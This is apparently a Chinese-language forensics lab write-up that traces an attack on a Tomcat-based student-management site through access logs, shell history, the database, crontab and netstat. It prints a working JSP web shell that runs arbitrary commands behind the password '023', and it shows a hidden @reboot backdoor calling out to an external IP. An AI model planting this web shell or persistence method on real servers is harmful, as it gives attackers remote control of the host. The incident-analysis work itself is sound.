简介 1 2 3 4 5 6 7 8 9 10 11 账号:root 密码:123456 ssh root@IP 1.请提交攻击者的IP地址 2.请提交攻击者使用的操作系统 3.请提交攻击者进入网站后台的密码 4.请提交攻击者首次攻击成功的时间,格式:DD/MM/YY:hh:mm:ss 5.请提交攻击者上传的恶意文件名(含路径) 6.请提交攻击者写入的恶意后门文件的连接密码 7.请提交攻击者创建的用户账户名称 8.请提交恶意进程的名称 9.请提交恶意进程对外连接的IP地址
tomacat的日志路径一般在:/opt/tomcat/logs
1.请提交攻击者的IP地址 history
查看历史命令
1 2 3 分析以下日志: localhost_access_log.2023-05-08.txt localhost_access_log.2023-05-09.txt
1 2 发现仅统计出现一个IP 192.168.31.132
2.请提交攻击者使用的操作系统 grep -a 'POST' localhost_access_log.2023-05-08.txt
1 2 192.168.31.132 - - [08/May/2023:04:59:22 -0400] "POST /check_register HTTP/1.1" 200 76 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35 所以为Windows
3.请提交攻击者进入网站后台的密码
从数据库里找网站后台的密码
1 2 在历史命令中看到网站数据库为mysql密码为P@ssw0rd! 尝试连接并获取到网站后台的密码
mysql -u root -pP@ssw0rd!
show databases;
use student_manager;
show tables;
1 2 3 | lx | lx741852 | lx | ? | luoxiang@qq.com | | Juneha | Juneha | | | juneha@qq.com | 再结合2可知 攻击者进入网站后台的密码为 Juneha
4.请提交攻击者首次攻击成功的时间,格式:DD/MM/YY:hh:mm:ss
很清楚可以看出攻击者是利用文件上传攻击成功
1 2 3 4 192.168.31.132 - - [08/May/2023:05:02:16 -0400] "POST /upload_teacherImg HTTP/1.1" 200 84 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35 故首次攻击成功时间为08/May/2023:05:02:16 -0400 如果要化为中国标准时间为东八区 故要加12 为08/May/2023:17:02:16
5.请提交攻击者上传的恶意文件名(含路径) grep -nr "exec(" .|grep jsp
grep -rl "exec("
1 /opt/tomcat/webapps/ROOT/teacher/cmd.jsp
6.请提交攻击者写入的恶意后门文件的连接密码
1 2 3 4 5 6 7 8 9 10 11 12 13 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %> 故为023
7.请提交攻击者创建的用户账户名称 在history
历史命令中发现Jumeha密码被更改
1 2 3 4 5 6 133 passwd Juneha 134 crontab -e 135 crontab -l 136 /home/Juneha/.t0mcat & 且在Juneha存在t0mcat可执行程序 即为Juneha
8.请提交恶意进程的名称 crontab -l
存在计划任务
1 2 @reboot /home/Juneha/.t0mcat 故为 t0mcat
9.请提交恶意进程对外连接的IP地址 netstat -anp|grep .t0
1 2 3 tcp 0 1 192.168.36.149:48008 114.114.114.114:8888 SYN_SENT 6093/./.t0mcat tcp 0 1 192.168.36.149:48006 114.114.114.114:8888 SYN_SENT 827/.t0mcat 故为 114.114.114.114